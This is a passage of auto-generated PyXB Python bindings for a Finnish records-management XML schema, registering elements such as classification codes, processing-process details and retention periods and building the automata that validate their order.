fac.UpdateInstruction(cc_6, True) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_6, False) ]))
st_9._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_7, True) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_7, False) ]))
st_10._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_8, True) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_8, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_8, False) ]))
st_11._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_9, True) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_9, False) ]))
st_12._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_10, True) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_10, False) ]))
st_13._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_11, True) ]))
st_14._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
TosTiedotTyyppi._Automaton = _BuildAutomaton_7()
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TilaKoodi'), tilaKoodiTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OsaVersio'), versioTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Luokitustunnus'), luokitustunnusTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LuokitusKuvausTeksti'), kuvausTekstiTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi'), pyxb.binding.datatypes.string, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm'), _ImportedBinding_metarecord_binding__jhs.LoppuPvmTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), CTD_ANON_, scope=luokkaTyyppi, documentation='Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.', location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Nimeke'), nimekeTyyppi, scope=luokkaTyyppi, location=None))
luokkaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'KasittelyprosessiTiedot'), kasittelyprosessiTiedotTyyppi, scope=luokkaTyyppi, location=None))
def _BuildAutomaton_8 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_8
del _BuildAutomaton_8
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_6)
cc_7 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_7)
cc_8 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_8)
cc_9 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_9)
cc_10 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_10)
cc_11 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_11)
cc_12 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_12)
cc_13 = fac.CounterCondition(min=0, max=None, metadata=None)
counters.add(cc_13)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi')), None)
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi')), None)
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = None
symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm')), None)
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = None
symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi')), None)
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = None
symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm')), None)
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = None
symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi')), None)
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = None
symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm')), None)
st_6 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = None
symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm')), None)
st_7 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
final_update = None
symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm')), None)
st_8 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_8)
final_update = None
symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Luokitustunnus')), None)
st_9 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_9)
final_update = None
symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'TilaKoodi')), None)
st_10 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_10)
final_update = None
symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'OsaVersio')), None)
st_11 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_11)
final_update = set()
symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Nimeke')), None)
st_12 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_12)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_11, False))
symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'LuokitusKuvausTeksti')), None)
st_13 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_13)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_12, False))
symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'KasittelyprosessiTiedot')), None)
st_14 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_14)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_13, False))
symbol = pyxb.binding.content.ElementUse(luokkaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Laajennos')), None)
st_15 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_15)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_2, False) ]))
st_2._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_3, True) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_3, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_3, False) ]))
st_3._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_4, True) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_4, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_4, False) ]))
st_4._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_5, True) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_5, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_5, False) ]))
st_5._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_6, True) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_6, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_6, False) ]))
st_6._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_7, True) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_7, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_7, False) ]))
st_7._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_8, True) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_8, False) ]))
st_8._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_10, [
]))
transitions.append(fac.Transition(st_11, [
]))
transitions.append(fac.Transition(st_12, [
]))
st_9._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_9, True) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_9, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_9, False) ]))
st_10._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_10, True) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_10, False) ]))
st_11._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_13, [
]))
transitions.append(fac.Transition(st_14, [
]))
transitions.append(fac.Transition(st_15, [
]))
st_12._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_11, True) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_11, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_11, False) ]))
st_13._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_12, True) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_12, False) ]))
st_14._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_13, True) ]))
st_15._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
luokkaTyyppi._Automaton = _BuildAutomaton_8()
nimekeKielellaTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'NimekeTeksti'), nimekeTekstiTyyppi, scope=nimekeKielellaTyyppi, location=None))
def _BuildAutomaton_9 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_9
del _BuildAutomaton_9
import pyxb.utils.fac as fac
counters = set()
states = []
final_update = set()
symbol = pyxb.binding.content.ElementUse(nimekeKielellaTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'NimekeTeksti')), None)
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
transitions = []
st_0._set_transitionSet(transitions)
return fac.Automaton(states, counters, False, containing_state=None)
nimekeKielellaTyyppi._Automaton = _BuildAutomaton_9()
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi'), pyxb.binding.datatypes.string, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'TietojarjestelmaNimi'), pyxb.binding.datatypes.string, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm'), _ImportedBinding_metarecord_binding__jhs.AlkuPvmTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm'), _ImportedBinding_metarecord_binding__jhs.LoppuPvmTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PaatietoryhmatTeksti'), pyxb.binding.datatypes.string, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'ProsessinOmistajaNimi'), _ImportedBinding_metarecord_binding__jhs.NimiTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'KokoavanProsessitunnuksenLahdeTeksti'), pyxb.binding.datatypes.string, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Laajennos'), CTD_ANON_, scope=kasittelyprosessiTiedotTyyppi, documentation='Yleinen laajennoselementti. Laajennoksilla mahdollistetaan organisaatiokohtaiset elementit.', location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Asiasanat'), asiasanatTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Toimenpidetiedot'), toimenpidetiedotTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Kayttorajoitustiedot'), kayttorajoitusTiedotTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
kasittelyprosessiTiedotTyyppi._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'Sailytysaikatiedot'), sailytysaikaTiedotTyyppi, scope=kasittelyprosessiTiedotTyyppi, location=None))
def _BuildAutomaton_10 ():
# Remove this helper function from the namespace after it is invoked
global _BuildAutomaton_10
del _BuildAutomaton_10
import pyxb.utils.fac as fac
counters = set()
cc_0 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_0)
cc_1 = fac.CounterCondition(min=0, max=None, metadata=None)
counters.add(cc_1)
cc_2 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_2)
cc_3 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_3)
cc_4 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_4)
cc_5 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_5)
cc_6 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_6)
cc_7 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_7)
cc_8 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_8)
cc_9 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_9)
cc_10 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_10)
cc_11 = fac.CounterCondition(min=0, max=None, metadata=None)
counters.add(cc_11)
cc_12 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_12)
cc_13 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_13)
cc_14 = fac.CounterCondition(min=0, max=1, metadata=None)
counters.add(cc_14)
cc_15 = fac.CounterCondition(min=0, max=None, metadata=None)
counters.add(cc_15)
states = []
final_update = None
symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'TietojarjestelmaNimi')), None)
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = None
symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Kayttorajoitustiedot')), None)
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Sailytysaikatiedot')), None)
st_2 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Toimenpidetiedot')), None)
st_3 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'OrganisaatioNimi')), None)
st_4 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'LaatijaNimi')), None)
st_5 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'LaadittuPvm')), None)
st_6 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'MuokkaajaNimi')), None)
st_7 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_6, False))
symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'MuokattuPvm')), None)
st_8 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_8)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_7, False))
symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyjaNimi')), None)
st_9 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_9)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_8, False))
symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'HyvaksyttyPvm')), None)
st_10 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_10)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_9, False))
symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloAlkaaPvm')), None)
st_11 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_11)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_10, False))
symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'VoimassaoloPaattyyPvm')), None)
st_12 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_12)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_11, False))
symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'Asiasanat')), None)
st_13 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_13)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_12, False))
symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'PaatietoryhmatTeksti')), None)
st_14 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_14)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_13, False))
symbol = pyxb.binding.content.ElementUse(kasittelyprosessiTiedotTyyppi._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'ProsessinOmistajaNimi')), None)
st_15 = fac.State(symbol, is_initial=False, final_update=final_update, is_unordered_catenation=False)
states.append(st_15)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_14, False))
